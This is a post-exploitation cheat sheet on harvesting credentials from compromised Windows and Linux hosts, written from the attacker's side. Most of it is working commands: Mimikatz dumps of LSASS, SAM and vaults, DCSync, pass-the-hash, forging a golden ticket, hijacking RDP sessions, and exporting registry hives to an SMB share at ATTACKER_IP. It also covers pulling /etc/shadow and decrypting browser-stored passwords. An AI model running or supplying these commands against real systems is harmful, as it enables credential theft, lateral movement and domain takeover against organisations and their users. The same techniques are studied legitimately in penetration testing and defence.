After compromising a target is important to recollect the maximum credentials to spray them on the network.
Looking for Interesting Files
If the target have a web application that use a database try to find the config.php file in order to obtain the database connection.
Look what type of applications are installed and look for config files in order to find new pair of creds.
Secretsdump
secretsdump is a python script from impacket that retrieves secrets such as mimikatz in a remote way.
impacket-secretsdump corp/Administrador:'passw0rd'@10.10.10.10
Mimikatz
It can be user to dump credentials,cached logon credentials, SAM, System, LSASS, VAULT, tuickets and moreā¦ To dump those credentials admin privs are needed.
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords /full
sekurlsa::wdigest
sekurlsa::credman
sekurlsa::ekeys
lsadump::sam
lsadump::lsa /patch
vault::cred /patch
vault::list
ts::mstsc
ts::sessions
Or we can do a One-Line command:
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords full" "sekurlsa::wdigest" "sekurlsa::credman" "lsadump::sam" "vault::cred" "vault::list" "ts::mstsc" "exit"
Note: if
sekurlsa::logoncredentialsdoes not work in Windows 10 or Server 2019 download a older realease.
Invoke-Mimikatz
The script is userful to execute mimikatz with PowerShell without droppin the mimikatz exe to disk. Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could be used from this script.
Like mimikatz.exe the script needs administrative privileges for dumping credentials from local machine.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
Invoke-Mimikatz -DumpCreds
We can also dump credentials on multiple remote machines.
Invoke-Mimikatz -DumCreds -ComputerName @("machine01","machine02")
Invoke-Mimikatz gives us the oportunity to excute differents attacks. Examples of Attacks:
DCSync is more silent:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:corp\Administrator"'
- Overpass the Hash:
Invoke-Mimikatz -Command '"sekurlsa::pth /usr:Administrator /domain:corp.local /ntlm:<ntlmhash> /run:powershell.exe"'
- Crafting a golden ticket:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:corp.local /sid:S-1-5-21-268341927-4156873456-1784235843 /krbtgt:a9b30e5b0dc865eadcea9411e4ade72d /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Hijacking RDP Session
To hijack a RDP session we need mimikatz.
.\mimikatz.exe
privilege::debug
ts::sessions
ts::mstsc
token::elevate
ts::remote /id:3
SAM and LSA Secrets (Windows)
In Windows environments, passwords are stored hashed in resgistriy hives.
| Hive | Details | Format |
|---|---|---|
| SAM | Stores locally cached credentials | LM or NT hashes |
| SECURITY | Stores domain cached credentials (LSA secrets) | Plaintext, LM or NT hashes,Kerberos Keys (DES, AES), Domain Cached Credential (DCC1 and DCC2) |
| SYSTEM | Contain enough info to decrypt SAM and LSA secrets | N/A |
You can easily dump the SAM , SECURITY and SYSTEM registries hives with different tools, from linux and windows:
Impacket
With impacket-reg.py can dump the SAM and LSA secrets remotely.
impacket-smbserver share . -smb2support
impacket-reg DOMAIN/user:pass@IP save -keyName 'HKLM\SAM' -o \\SMBIP\share
impacket-reg DOMAIN/user:pass@IP save -keyName 'HKLM\SYSTEM' -o \\SMBIP\share
impacket-reg DOMAIN/user:pass@IP save -keyName 'HKLM\SECURITY' -o \\SMBIP\share
Reg.exe
When the windows operating system is running, the hives are in use and mounted, so we can not directly copy the file. So we need to export them with reg.exe.
reg save HKLM\SAM c:\Windows\Temp\sam.save
reg save HKLM\SYSTEM c:\Windows\Temp\system.save
reg save HKLM\SECURITY c:\Windows\Temp\security.save
You can also dump it remotely:
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SAM' -o '\\ATTACKER_IPs\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SYSTEM' -o '\\ATTACKER_IP\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SECURITY' -o '\\ATTACKER_IP\someshare'
Finally on our kali we just need to use sam2dump or impacket-secretsdump to get the hashes.
samdump2 system.save sam.save > hashes.txt
impacket-secretsdump -sam ./sam.save -system ./system.save -security ./security.save LOCAL
CrackMapExec
With crackmapexec we can dump it remotely like imapecket-reg:
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa
crackmapexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa
crackmapexec smb $TARGETS --kerberos --sam/--lsa
Mimikatz
mimikatz is a powerfull post-exploitation tool, with mimikatz we can extract all secrets included SAM and LSA:
privilege::debug
lsadump::sam
lsadump::sam /sam:'C:\Windows\Temp\sam.save' /system:'C:\Windows\Temp\system.save'
lsadump::secrets
lsadump::secrets /security:'C:\Windows\Temp\security.save' /system:'C:\Windows\Temp\system.save'
PASSWD and SHADOW (Lin)
Same as Windows, when we pwn a privilege user such as root we can get system users and passwords. In linux we just need to copy the following files to our attacking machine.
/etc/passwd
/etc/shadow
Finally on our kali machine we just need to use unshadow to get the hashes:
unshadow passwd shadow > hashes.txt
Mozilla Firefox / Thunderbird / WaterFox / SeaMonkey
Some users victims uses Mozilla Firefox or Mozilla Thunderbird and stores their credentials without protection.
On windows search the following route:
C:\Users\VICTIM\AppData\Roaming
Zip the content of Firefox or Thunderbird folder and transfer it to the attacking machine. Once transferred we are going to use firefox-decrypt tool to get the plaintext credentials.
$ python firefox_decrypt.py /folder/containing/profiles.ini/
Master Password for profile /tmp/Thunderbird/Profiles/s68bba5j.default:
2021-09-21 19:55:06,811 - WARNING - Attempting decryption with no Master Password
Website: mailbox://test.local
Username: 'eric'
Password: 'sup3rs3cr3t'
Website: smtp://test.local
Username: 'eric'
Password: 'sup3rs3cr3t'
Google Chrome
Chrome sotres DPAPI protected credentials in a local SQLite database, which can be found on windows machines on AppData directory.
C:\> ls C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Size Type Last Modified Name
---- ---- ------------- ----
40kb fil 02/25/2021 13:21:18 Login Data
SharpChromium is a good tool to decrypt these stored credentials.
C:\> .\SharpChromium.exe logins
[*] Beginning Google Chrome extraction.
--- Chromium Credential (User: user) ---
URL :
Username : user
Password : Passw0rd!
[*] Finished Google Chrome extraction.
[*] Done.